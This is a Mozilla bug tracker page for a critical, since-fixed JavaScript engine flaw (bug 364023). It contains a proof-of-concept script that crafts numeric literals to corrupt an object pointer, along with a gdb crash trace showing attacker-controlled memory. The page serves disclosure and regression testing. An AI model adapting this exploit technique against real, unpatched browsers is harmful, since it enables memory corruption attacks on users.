Bug 364023 - LITOPX DEFFUN is exploitable
Status: VERIFIED FIXED
Whiteboard: [sg:critical] security tracker for bu...
Keywords: crash, verified1.8.0.10, verified1.8.1.2
Product: Core
Component: JavaScript Engine
Version: Trunk
Platform: All All
Importance: -- critical
Assigned To: shutdown
Reported: 2006-12-15 21:00 PST by shutdown
Modified: 2007-08-08 03:30 PDT
Flags: dveditz: blocking1.8.1.2+, dveditz: blocking1.8.0.10+, bob: in-testsuite+
Attachments
js1_5/Function/regress-364023.js (2.55 KB, text/plain), 2007-01-17 03:27 PST, Bob Clary [:bc:]

Description shutdown 2006-12-15 21:00:11 PST
$ cat litopx-deffun-x.txt
function exploit() {
  var code = "";
  for(var i = 0; i < 0x10000; i++) {
    if(i == 125) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void " + (0x10000000000000 + i) + ";\n";
    }
  }
  code += "function foo() {}\n";
  eval(code);
}
exploit();

$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
    1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Comment 1 Daniel Veditz [:dveditz] 2006-12-16 09:28:46 PST
shutdown contributed a patch for bug 363988
Comment 2 Brendan Eich [:brendan] 2006-12-16 12:03:01 PST
Fix landed for bug 363988.

/be
Comment 3 Bob Clary [:bc:] 2007-01-17 03:27:05 PST
Created attachment 251755 [details]
js1_5/Function/regress-364023.js
Comment 4 Bob Clary [:bc:] 2007-01-29 09:48:03 PST
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Comment 5 Bob Clary [:bc:] 2007-08-08 03:30:28 PDT
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v  <--  regress-364023.js
initial revision: 1.1